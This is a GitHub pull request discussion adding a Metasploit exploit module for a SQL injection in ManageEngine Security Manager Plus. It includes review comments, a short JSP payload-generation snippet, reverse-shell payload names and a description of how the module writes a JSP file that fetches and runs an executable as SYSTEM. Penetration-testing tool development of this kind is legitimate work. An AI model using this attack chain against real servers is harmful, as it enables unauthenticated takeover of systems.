New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add ManageEngine Security Manager AdvanceSearch Module #953
Conversation
…ramework into scriptjunkie-migrator
From EDB.
Plus additional fixes
Verified working against current Windows trial installer from ManageEngine running on 2k3. I don't like the design of having TcpServer serve up the payload. If that's the only way to do it, then fine, but I'd much rather see the payload delivered via the same mechanism as the exploit to improve reliability in the presence of firewalls and other pesky network devices. |
Done. Tested against on Windows;
New Linux target:
|
# Embeds our executable in JSP | ||
# | ||
def generate_jsp_payload | ||
my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address("50.50.50.50") : datastore['SRVHOST'] |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
no longer needed
Examples demonstrating how the new cleanup function operates with different payloads: Using windows/meterpreter/reverse_tcp:
Using windows/shell_reverse_tcp:
Using linux/x86/meterpreter/reverse_tcp:
Using linux/x86/shell_reverse_tcp:
|
Re-tested the module again after all the above changes. Demo: Using linux/x86/shell_reverse_tcp (auto-target):
Using linux/x86/meterpreter/reverse_tcp (auto-target):
Using windows/meterpreter/reverse_tcp (auto-target):
Using windows/shell_reverse_tcp:
|
I'm sorry, egypt... this code review/testing pace just isn't working out. I'm gonna push. Please file a ticket on redmine if you actually find a bug later. |
Originally based on xistence Metasploit PoC from Exploit-DB.
This module exploits a SQL injection found in ManageEngine Security Manager Plus advanced search page. It will send a malicious SQL query to create a JSP file under the web root directory, and then let it download and execute our malicious executable under the context of SYSTEM. Authentication is not required in order to exploit this vulnerability.
Demo: